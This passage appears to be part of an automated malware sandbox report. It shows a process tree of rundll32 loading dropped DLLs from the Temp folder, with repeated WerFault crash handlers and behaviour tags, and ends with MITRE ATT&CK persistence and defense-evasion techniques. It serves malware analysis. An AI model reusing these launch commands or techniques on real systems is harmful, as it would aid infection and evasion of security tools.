- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2324 -ip 23241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2136 -ip 21361⤵PID:5568
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:5412 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 4522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5088
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5412 -ip 54121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5404 -ip 54041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3092 -ip 30921⤵PID:4528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7116 -ip 71161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 584 -ip 5841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5688
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:8092
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:7792 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:7560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 4483⤵
- Program crash
PID:5832
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7560 -ip 75601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7796
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 2160 -ip 21601⤵PID:6588
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 3540 -ip 35401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1616 -ip 16161⤵PID:9112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 8008 -ip 80081⤵PID:9184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5572 -ip 55721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5004 -ip 50041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:4972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7408 -ip 74081⤵
- Suspicious behavior: EnumeratesProcesses
PID:4644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 5704 -ip 57041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 7960 -ip 79601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 8920 -ip 89201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 3520 -ip 35201⤵PID:3276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3788 -ip 37881⤵PID:9504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6636 -ip 66361⤵PID:10036
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 704 -p 5532 -ip 55321⤵PID:1592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 9532 -ip 95321⤵PID:436
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 9380 -ip 93801⤵PID:10028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6388 -ip 63881⤵PID:8528
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8696 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 4523⤵
- Program crash
PID:10012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 4523⤵
- Program crash
PID:6092
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6584 -ip 65841⤵PID:8432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4244 -ip 42441⤵PID:4512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5980 -ip 59801⤵PID:4556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6428 -ip 64281⤵PID:10504
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 5180 -ip 51801⤵PID:11024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 8308 -ip 83081⤵PID:6076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 7688 -ip 76881⤵PID:5136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 9788 -ip 97881⤵PID:8024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 3532 -ip 35321⤵PID:5836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 8624 -ip 86241⤵PID:9664
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 800 -p 8236 -ip 82361⤵PID:9616
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 10072 -ip 100721⤵PID:9800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 9156 -ip 91561⤵PID:10428
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 380 -p 11220 -ip 112201⤵PID:8612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 1420 -ip 14201⤵PID:8268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 9772 -ip 97721⤵PID:8412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 9052 -ip 90521⤵PID:4340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10804 -ip 108041⤵PID:11208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 11208 -ip 112081⤵PID:648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5852 -ip 58521⤵PID:7468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6680 -ip 66801⤵PID:4508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 12996 -ip 129961⤵PID:12808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7780 -ip 77801⤵PID:7296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 13832 -ip 138321⤵PID:13364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 9236 -ip 92361⤵PID:14024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6188 -ip 61881⤵PID:10512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 8600 -ip 86001⤵PID:11784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 12916 -ip 129161⤵PID:14156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4644 -ip 46441⤵PID:12020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 12708 -ip 127081⤵PID:2392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 12676 -ip 126761⤵PID:12892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 12676 -ip 126761⤵PID:12620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4324 -ip 43241⤵PID:11348
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1